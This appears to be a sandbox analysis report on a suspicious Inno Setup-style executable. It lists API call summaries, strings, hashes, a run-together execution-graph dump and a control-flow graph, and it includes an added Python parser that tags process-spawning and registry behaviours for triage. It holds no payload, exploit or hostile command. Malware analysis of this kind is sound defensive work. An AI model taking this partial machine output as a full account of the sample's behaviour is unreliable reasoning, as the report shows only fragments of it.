                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                            • API String ID: 3952431833-1023667238
                                                                                            • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                            • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                            • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                              • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                            • String ID: 0nI
                                                                                            • API String ID: 3798668922-794067871
                                                                                            • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                            • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
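The function summaries above follow one fixed layout: direct API calls, calls inherited from callees (the "Part of subcall function" entries), string xrefs, memory-dump provenance and the Similarity identifiers. When a report runs to thousands of these blocks it is worth parsing them rather than reading them. The following is an added example written for this page, not Joe Sandbox code and not part of the original report: it parses a short excerpt in that layout (copied from the listing above, with the Associated and hash lines trimmed) and flags blocks that spawn processes or touch the registry. The behaviour buckets in `BEHAVIOURS` are the editor's own triage categories, not Joe Sandbox signature names, and the `installer_fingerprint` check relies on the well-known Inno Setup convention of an `_is1` uninstall-key suffix and `Inno Setup:` value names; both are assumptions layered on top of the report text. Note the distinction the parser preserves: a `Part of subcall function` entry belongs to a callee, so by default it is not counted against the function being summarised.

```python
"""Parse Joe Sandbox per-function summary blocks into records and flag
behaviours worth a second look during triage.

Added example for this page; not Joe Sandbox code. Field names and layout
come from the listing above. BEHAVIOURS and the Inno Setup fingerprint are
the editor's assumptions.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Excerpt in the report's own layout (constructed from the listing above,
# with Associated / Opcode / Instruction lines trimmed for brevity).
SAMPLE = r"""
APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
Strings
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
Strings
• %s\%s_is1, xrefs: 00478F10
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
Strings
• Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
• Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID:
• String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
• API String ID: 0-1974262853
APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
• CloseHandle.KERNEL32(004964A8,00000000), ref: 00496425
  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
Strings
Memory Dump Source
• Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: 0nI
• API String ID: 3798668922-794067871
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• [Part of subcall function XXXX: ]Name.MODULE(args), ref: XXXX"
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$")
# "• some string, xrefs: XXXX"  (non-greedy: the string itself may contain commas)
STR_RE = re.compile(r"^\s*•\s*(?P<text>.*?),\s*xrefs:\s*(?P<ref>[0-9A-F]+)\s*$")
# "• Key: value"  (value may be empty, as in "API ID:" for blocks without APIs)
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*?)\s*$")

# Editor's triage buckets (assumption), keyed by API name as the report prints it.
BEHAVIOURS = {
    "process-execution": {"CreateProcessA", "CreateProcessW", "ShellExecuteA",
                          "ShellExecuteW", "ShellExecuteEx", "ShellExecuteExA", "ShellExecuteExW"},
    "registry-access": {"RegOpenKeyExA", "RegQueryValueExA", "RegEnumValueA", "RegSetValueExA"},
    "timestamp-manipulation": {"SetFileTime"},
}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]           # naive split on ','; string-literal args may contain commas
    ref: str                  # address of the call site
    via_subcall: str | None   # callee address when the entry is "Part of subcall function"


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[tuple[str, str]] = field(default_factory=list)   # (text, xref)
    fields: dict[str, str] = field(default_factory=dict)           # Source File, API ID, ...


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split the listing into blocks. A block starts at an 'APIs' header, or at a
    'Strings' header that is not preceded by 'APIs' (blocks with no API calls
    omit the 'APIs' header entirely, as seen in the listing above)."""
    blocks: list[FunctionBlock] = []
    current: FunctionBlock | None = None
    section = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped in SECTION_HEADERS:
            if stripped == "APIs" or (stripped == "Strings" and section != "APIs"):
                current = FunctionBlock()
                blocks.append(current)
            section = stripped
            continue
        if current is None or not stripped.startswith("•"):
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            current.apis.append(ApiCall(m["name"], m["module"], m["args"].split(","), m["ref"], m["sub"]))
        elif section == "Strings" and (m := STR_RE.match(line)):
            current.strings.append((m["text"], m["ref"]))
        elif section in ("Memory Dump Source", "Similarity") and (m := FIELD_RE.match(line)):
            current.fields.setdefault(m["key"], m["val"])   # keep the first of repeated keys
    return blocks


def classify(block: FunctionBlock, include_subcalls: bool = False) -> set[str]:
    """Behaviour tags for a block. Subcall entries are inherited from callees and
    are skipped unless include_subcalls is set, so a function is not blamed for
    what its helpers do."""
    tags: set[str] = set()
    for call in block.apis:
        if call.via_subcall and not include_subcalls:
            continue
        tags.update(tag for tag, names in BEHAVIOURS.items() if call.name in names)
    return tags


def installer_fingerprint(block: FunctionBlock) -> bool:
    """True if the block's strings match the Inno Setup uninstall-key convention
    ('<AppId>_is1') or an 'Inno Setup: ...' value name (assumption, see lead-in)."""
    return any("_is1" in s or s.startswith("Inno Setup:") for s, _ in block.strings)


def triage(text: str) -> list[dict]:
    """One summary row per block: which API group it carries, the first call-site
    or xref address, direct-call behaviour tags and the installer fingerprint."""
    rows = []
    for b in parse_blocks(text):
        ref = b.apis[0].ref if b.apis else (b.strings[0][1] if b.strings else None)
        rows.append({"api_id": b.fields.get("API ID", ""), "ref": ref,
                     "tags": sorted(classify(b)), "inno_setup": installer_fingerprint(b)})
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Run it on the full listing (paste the page text into `SAMPLE` or read it from a file) and the rows with `process-execution` point straight at the `ShellExecuteA`, `ShellExecuteEx` and `CreateProcessA` blocks, while the `inno_setup` column isolates the installer-stub plumbing so it can be set aside when looking for the payload's own behaviour.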
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$EnumQuery
                                                                                            • String ID: Inno Setup: No Icons
                                                                                            • API String ID: 1576479698-2016326496
                                                                                            • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                            • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 1799206407-488339322
                                                                                            • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                            • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 2018770650-488339322
                                                                                            • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                            • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                            APIs
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                            • String ID: T$H
                                                                                            • API String ID: 377330604-488339322
                                                                                            • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                            • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                            APIs
                                                                                              • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(739B0000,00481A2F), ref: 0047D0E2
                                                                                              • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                              • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                            Strings
                                                                                            • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                            • API String ID: 1717587489-3199836293
                                                                                            • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                            • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2733403433.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2733373975.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733590486.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733715118.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733749747.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2733782720.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_Hbq580QZAR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                            • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                            Execution Graph

                                                                                            Execution Coverage: 2.5%
                                                                                            Dynamic/Decrypted Code Coverage: 69%
                                                                                            Signature Coverage: 18.8%
                                                                                            Total number of Nodes: 464
                                                                                            Total number of Limit Nodes: 29
library calls 61597->61686 61599->61558 61720 2d570c0 36 API calls 2 library calls 61600->61720 61602 2d54a09 61721 2d575dc InitializeCriticalSectionAndSpinCount ___lock_fhandle 61602->61721 61604 2d54a0e 61605 2d54a12 61604->61605 61723 2d57d4e TlsAlloc 61604->61723 61722 2d54a7a 62 API calls 2 library calls 61605->61722 61608 2d54a17 61608->61568 61609 2d54a24 61609->61605 61610 2d54a2f 61609->61610 61611 2d5762a __calloc_crt 59 API calls 61610->61611 61612 2d54a3c 61611->61612 61613 2d54a71 61612->61613 61724 2d57daa TlsSetValue 61612->61724 61725 2d54a7a 62 API calls 2 library calls 61613->61725 61616 2d54a50 61616->61613 61618 2d54a56 61616->61618 61617 2d54a76 61617->61568 61619 2d54951 __initptd 59 API calls 61618->61619 61620 2d54a5e GetCurrentThreadId 61619->61620 61620->61568 61625 2d5923b WideCharToMultiByte 61621->61625 61627 2d5285f 61621->61627 61623 2d592a5 FreeEnvironmentStringsW 61623->61627 61624 2d5926e 61726 2d57672 59 API calls 2 library calls 61624->61726 61625->61623 61625->61624 61634 2d58b76 61627->61634 61628 2d59274 61628->61623 61629 2d5927b WideCharToMultiByte 61628->61629 61630 2d59291 61629->61630 61631 2d5929a FreeEnvironmentStringsW 61629->61631 61632 2d51f84 _free 59 API calls 61630->61632 61631->61627 61633 2d59297 61632->61633 61633->61631 61635 2d58b82 CallCatchBlock 61634->61635 61636 2d574ab __lock 59 API calls 61635->61636 61637 2d58b89 61636->61637 61638 2d5762a __calloc_crt 59 API calls 61637->61638 61640 2d58b9a 61638->61640 61639 2d58c05 GetStartupInfoW 61647 2d58c1a 61639->61647 61650 2d58d49 61639->61650 61640->61639 61641 2d58ba5 CallCatchBlock @_EH4_CallFilterFunc@8 61640->61641 61641->61588 61642 2d58e11 61729 2d58e21 RtlLeaveCriticalSection _doexit 61642->61729 61644 2d5762a __calloc_crt 59 API calls 61644->61647 61645 2d58d96 GetStdHandle 61645->61650 61646 2d58da9 GetFileType 61646->61650 61647->61644 61649 2d58c68 61647->61649 61647->61650 61648 2d58c9c GetFileType 61648->61649 61649->61648 61649->61650 61727 
2d57dcc InitializeCriticalSectionAndSpinCount 61649->61727 61650->61642 61650->61645 61650->61646 61728 2d57dcc InitializeCriticalSectionAndSpinCount 61650->61728 61654 2d58e8f GetModuleFileNameA 61653->61654 61655 2d58e8a 61653->61655 61657 2d58ebc 61654->61657 61736 2d53efa 71 API calls __setmbcp 61655->61736 61730 2d58f2f 61657->61730 61659 2d52879 61659->61593 61664 2d590ab 61659->61664 61662 2d58ef5 61662->61659 61663 2d58f2f _parse_cmdline 59 API calls 61662->61663 61663->61659 61665 2d590b4 61664->61665 61667 2d590b9 _strlen 61664->61667 61740 2d53efa 71 API calls __setmbcp 61665->61740 61668 2d5762a __calloc_crt 59 API calls 61667->61668 61671 2d52882 61667->61671 61676 2d590ef _strlen 61668->61676 61669 2d59141 61670 2d51f84 _free 59 API calls 61669->61670 61670->61671 61671->61593 61680 2d57028 61671->61680 61672 2d5762a __calloc_crt 59 API calls 61672->61676 61673 2d59168 61674 2d51f84 _free 59 API calls 61673->61674 61674->61671 61676->61669 61676->61671 61676->61672 61676->61673 61677 2d5917f 61676->61677 61741 2d5592c 59 API calls 2 library calls 61676->61741 61742 2d53b75 8 API calls 2 library calls 61677->61742 61679 2d5918b 61682 2d57034 __IsNonwritableInCurrentImage 61680->61682 61743 2d5ab8f 61682->61743 61683 2d57052 __initterm_e 61684 2d523b4 __cinit 68 API calls 61683->61684 61685 2d57071 _doexit __IsNonwritableInCurrentImage 61683->61685 61684->61685 61685->61593 61686->61570 61687->61597 61688->61562 61689->61569 61690->61576 61691->61572 61692->61570 61694 2d57da2 TlsGetValue 61693->61694 61695 2d57d9e 61693->61695 61694->61564 61695->61564 61697 2d57631 61696->61697 61699 2d5292e 61697->61699 61701 2d5764f 61697->61701 61746 2d5e9b8 61697->61746 61699->61570 61702 2d57daa TlsSetValue 61699->61702 61701->61697 61701->61699 61754 2d580c5 Sleep 61701->61754 61702->61581 61704 2d5495d CallCatchBlock 61703->61704 61705 2d574ab __lock 59 API calls 61704->61705 61706 2d5499a 61705->61706 61757 2d549f2 61706->61757 61709 2d574ab __lock 59 API 
calls 61710 2d549bb ___addlocaleref 61709->61710 61760 2d549fb 61710->61760 61712 2d549e6 CallCatchBlock 61712->61589 61714 2d51f8d HeapFree 61713->61714 61718 2d51fb6 _free 61713->61718 61715 2d51fa2 61714->61715 61714->61718 61765 2d54acb 59 API calls __getptd_noexit 61715->61765 61717 2d51fa8 GetLastError 61717->61718 61718->61570 61719->61570 61720->61602 61721->61604 61722->61608 61723->61609 61724->61616 61725->61617 61726->61628 61727->61649 61728->61650 61729->61641 61732 2d58f51 61730->61732 61735 2d58fb5 61732->61735 61738 2d5ef96 59 API calls x_ismbbtype_l 61732->61738 61733 2d58ed2 61733->61659 61737 2d57672 59 API calls 2 library calls 61733->61737 61735->61733 61739 2d5ef96 59 API calls x_ismbbtype_l 61735->61739 61736->61654 61737->61662 61738->61732 61739->61735 61740->61667 61741->61676 61742->61679 61744 2d5ab92 RtlEncodePointer 61743->61744 61744->61744 61745 2d5abac 61744->61745 61745->61683 61747 2d5e9c3 61746->61747 61751 2d5e9de 61746->61751 61748 2d5e9cf 61747->61748 61747->61751 61755 2d54acb 59 API calls __getptd_noexit 61748->61755 61749 2d5e9ee RtlAllocateHeap 61749->61751 61752 2d5e9d4 61749->61752 61751->61749 61751->61752 61756 2d56e73 RtlDecodePointer 61751->61756 61752->61697 61754->61701 61755->61752 61756->61751 61763 2d57615 RtlLeaveCriticalSection 61757->61763 61759 2d549b4 61759->61709 61764 2d57615 RtlLeaveCriticalSection 61760->61764 61762 2d54a02 61762->61712 61763->61759 61764->61762 61765->61717 61766 401cdb CopyFileA

                                                                                            Control-flow Graph

                                                                                            control_flow_graph 237 2d45e5e-2d460ec RtlInitializeCriticalSection GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress call 2d442c7 GetTickCount call 2d459fa GetVersionExA call 2d53760 call 2d51fbc * 8 GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap GetProcessHeap RtlAllocateHeap call 2d53760 * 3 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d51fbc * 4 QueryPerformanceCounter Sleep call 2d51fbc * 2 call 2d53760 * 2 282 2d460f0-2d460f2 237->282 283 2d460f4-2d460f9 282->283 284 2d460fb-2d460fd 282->284 285 2d46104 Sleep 283->285 286 2d460ff 284->286 287 2d4610a-2d46448 RtlEnterCriticalSection RtlLeaveCriticalSection 284->287 285->287 286->285 289 2d46464-2d4646e 287->289 290 2d4644a-2d46450 287->290 289->282 291 2d46474-2d46498 call 2d53760 call 2d4439c 289->291 292 2d46456-2d46463 call 2d4534d 290->292 293 2d46452-2d46454 290->293 291->282 300 2d4649e-2d464c9 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5134c 291->300 292->289 293->289 303 2d46513-2d4652b call 2d5134c 300->303 304 2d464cb-2d464da call 2d5134c 300->304 309 2d46531-2d46533 303->309 310 2d467d2-2d467e1 call 2d5134c 303->310 304->303 311 2d464dc-2d464eb call 2d5134c 304->311 309->310 314 2d46539-2d465e4 call 2d51fbc RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53760 * 5 call 2d4439c * 2 309->314 319 2d46826-2d46835 call 2d5134c 310->319 320 2d467e3-2d467e5 310->320 311->303 318 2d464ed-2d464fc call 2d5134c 311->318 365 2d465e6-2d465e8 314->365 366 2d46621 314->366 318->303 334 2d464fe-2d4650d call 2d5134c 318->334 332 2d46837-2d46840 call 2d45c11 call 2d45d1f 319->332 333 2d4684a-2d46859 call 2d5134c 319->333 320->319 324 2d467e7-2d46821 call 2d53760 RtlEnterCriticalSection RtlLeaveCriticalSection 320->324 324->282 347 2d46845 332->347 333->282 345 2d4685f-2d46861 333->345 334->282 334->303 345->282 348 2d46867-2d46880 call 2d4439c 345->348 347->282 348->282 
